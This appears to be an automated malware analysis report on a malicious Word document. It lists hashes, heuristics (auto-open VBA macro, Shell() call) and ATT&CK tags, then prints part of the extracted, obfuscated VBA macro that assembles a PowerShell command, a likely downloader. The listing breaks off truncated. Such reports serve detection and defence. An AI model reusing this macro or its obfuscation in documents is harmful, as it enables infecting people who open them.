Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7370204a50db25f0…

MALICIOUS

Office (OLE)

140.5 KB Created: 2018-05-21 21:22:00 Authoring application: Microsoft Office Word First seen: 2019-03-10
MD5: 2502b23cc68e2ac68ee06de24bc074c7 SHA-1: f7254d6a1210a02c6bc3c9916e45cfb3594b4ed7 SHA-256: 7370204a50db25f07f4802e6eab600a957368159f189dfa2409d3af87567c513
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates the presence of a Shell() call within the VBA code. The extracted VBA script attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The AutoOpen macro marker further suggests automatic execution upon opening.

Heuristics 5

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 151287 bytes
SHA-256: fc092062c2a1524ac1832f507418614c353cc1ac567b58cf9b1d976ff6e69004
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nkmURXXZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function CnpSzAKtzW()

On Error Resume Next
wiXmQIXtTwG = (RGjPIvjwNM - CLng(271724) + RfjCZD + Fix(ALwaJt / CDbl(495505 * Sqr(GzQHCYpQjqf))) - 583503 / Sin(jjOwEi - PGHkFzqIw + rqwmVCwSrKo - 928918 + CDbl(rqwmVCwSrKo)) * 847456 * Fix(271724))
XVoriIK = "p8r*'fFO5Bx1HNeT6P35Yi8Lo3CJDCANrBbZPrNQyFex7ZXREqoJyYP6zs8TSvAowershell  & ((GEt-varIabLe '*uMd4lwXQRg)nZHL"
crJwwHbFj = Left(Right(XVoriIK, 45), 30) + Left(Right(XVoriIK, 14), 2) + Left(Right(XVoriIK, 106), 3) + CStr(Left(Right(XVoriIK, 5), 1))

jQXzS = "M8P'TASJ5KStK9BEjWB2rWm.NaME[3,11,2]-joIN'')((('SABzBMBpLRHBcabTmHU8Qm2k682a((mumIPXPYz"
jiiMul = Left(Right(jQXzS, 64), 25) + Left(Right(jQXzS, 11), 3) + CStr(Left(Right(jQXzS, 84), 1))

WTvdJLrZ = Chr(43)
cBEBwQqUvw = "VMP2M8PB'klHWJnsa9BEjWB2rWmxtH"
mPjwOTZ = CStr(Left(Right(cBEBwQqUvw, 22), 9)) + CStr(Left(Right(cBEBwQqUvw, 4), 1))

QHCniXMZls = "dklVMP"
wwsVhkuu = Left(Right(QHCniXMZls, 5), 2)

FzcZYBGlS = Chr(43)
VIbQhZsXXk = "VMP2MmkldmkJ5KStK9lEj"
aDTfRZ = CStr(Left(Right(VIbQhZsXXk, 16), 6)) + Left(Right(VIbQhZsXXk, 3), 1)
wqNOcLvLwXf = (avBOjXA - CLng(433273) + lYTKD + Fix(hdYaUu / CDbl(681836 * Sqr(YcpHwtXD))) - 985192 / Sin(FiihS - oURLXA + YXCLO - 261128 + CDbl(YXCLO)) * 88784 * Fix(433273))
sPOXFmvKoT = Chr(43)
IqUGfUvkC = "VMP2M8PmklasdmktK9BEjWB2lWm"
uJAHdiA = CStr(Left(Right(IqUGfUvkC, 20), 8)) + CStr(Left(Right(IqUGfUvkC, 3), 1))

PvodzhnYQq = Chr(43)
vhdsZGbCj = "VMP2M8Pmkl = mktK9BEjWB2lWm"
fOzfmMUnXw = CStr(Left(Right(vhdsZGbCj, 20), 8)) + CStr(Left(Right(vhdsZGbCj, 3), 1))

UQBLCwm = Chr(43)
jqpamW = "VMP2M8PBTASJmkl&(ys8nys8mWmxtHYsibYBPBjklyQ30"
nPlfWvD = Left(Right(jqpamW, 33), 13) + CStr(Left(Right(jqpamW, 6), 2))

RqSOfUBoHw = Chr(43)
PfhXioDFu = "dPmklP2M8"
OvIqctAbY = Left(Right(PfhXioDFu, 7), 3)
ONEFUYUiYIl = (TiKjLidf - CLng(771622) + ivYWtiV + Fix(tXLQb / CDbl(713982 * Sqr(OhYTMf))) - 8970 / Sin(wkzEQFPX - aEEhkSfjbu + ZfkZGsUwwmL - 50396 + CDbl(ZfkZGsUwwmL)) * 446366 * Fix(771622))
zUiImhTPf = Chr(43)
WowZjjEjSQw = "VMP2ys8mkASJ5KSlK9"
wYzPiZiHHN = Left(Right(WowZjjEjSQw, 14), 5) + Left(Right(WowZjjEjSQw, 3), 1)

SFbaVkECW = Chr(43)
kvKdRFhZiT = "dPmk'P2M8"
DhPjmwHSQVb = Left(Right(kvKdRFhZiT, 7), 3)

WDBbnDOpqpD = Chr(43)
NJzEW = "VMP2'leysASJ5KS8K9"
fPGhQzPMIrs = Left(Right(NJzEW, 14), 5) + Left(Right(NJzEW, 3), 1)

jjsaXorrGY = Chr(43)
kiKKrGK = (SBwLoGjiJW - CLng(895373) + OYbji + Fix(OdVizn / CDbl(936583 * Sqr(lroENNCp))) - 19390 / Sin(APGQRfwqJP - SrrJujzdd + EUOaazSbVv - 773393 + CDbl(EUOaazSbVv)) * 642479 * Fix(895373))
kmXZhQJqi = "dy'VMP"
inipAOTQ = Left(Right(kmXZhQJqi, 5), 2)

VAVkYzFVkY = Chr(43)
STzqnjiZoo = "VMP2's8mkASJ5KSlK9"
YDbSfZdr = Left(Right(STzqnjiZoo, 14), 5) + Left(Right(STzqnjiZoo, 3), 1)

dhWJz = Chr(43)
sVqXSaFc = "VMP2M8Pmklw-omktK9BEjWB2lWm"
kbaFKHzcM = CStr(Left(Right(sVqXSaFc, 20), 8)) + CStr(Left(Right(sVqXSaFc, 3), 1))

pXcFnucw = Chr(43)
OzEMVcM = "VMP2MmklbmkJ5KStK9lEj"
AaLMKb = CStr(Left(Right(OzEMVcM, 16), 6)) + Left(Right(OzEMVcM, 3), 1)

bLIndMkrM = Chr(43)
CnpSzAKtzW = crJwwHbFj + jiiMul + WTvdJLrZ + mPjwOTZ + wwsVhkuu + FzcZYBGlS + aDTfRZ + sPOXFmvKoT + uJAHdiA + PvodzhnYQq + fOzfmMUnXw + UQBLCwm + nPlfWvD + RqSOfUBoHw + OvIqctAbY + zUiImhTPf + wYzPiZiHHN + SFbaVkECW + DhPjmwHSQVb + WDBbnDOpqpD + fPGhQzPMIrs + jjsaXorrGY + inipAOTQ + VAVkYzFVkY + YDbSfZdr + dhWJz + kbaFKHzcM + pXcFnucw + AaLMKb + bLIndMkrM

End Function

Function uiNRYaOop()

On Error Resume Next
mltJzziu = (AwXUZjqu - CLng(671998) + iDOllnPi + Fix(olkGp / CDbl(105301 * Sqr(MQPsHiIsDX))) - 511850 / Sin(cqwEp - uuqwOAzFtV + uIrtGiHJUzm - 956155 + CDbl(uIrtGiHJUzm)) * 988142 * Fix(671998))
zjsBnE = "VMP2M8PBmkljecymk9BEjWB2rWlxtH"
jZwOz = CStr(Left(Right(zjsBnE, 22), 9)) + CStr(Left(Right(zjsBnE, 4), 1))

XzjijG = Chr(43)
QawM
... (truncated)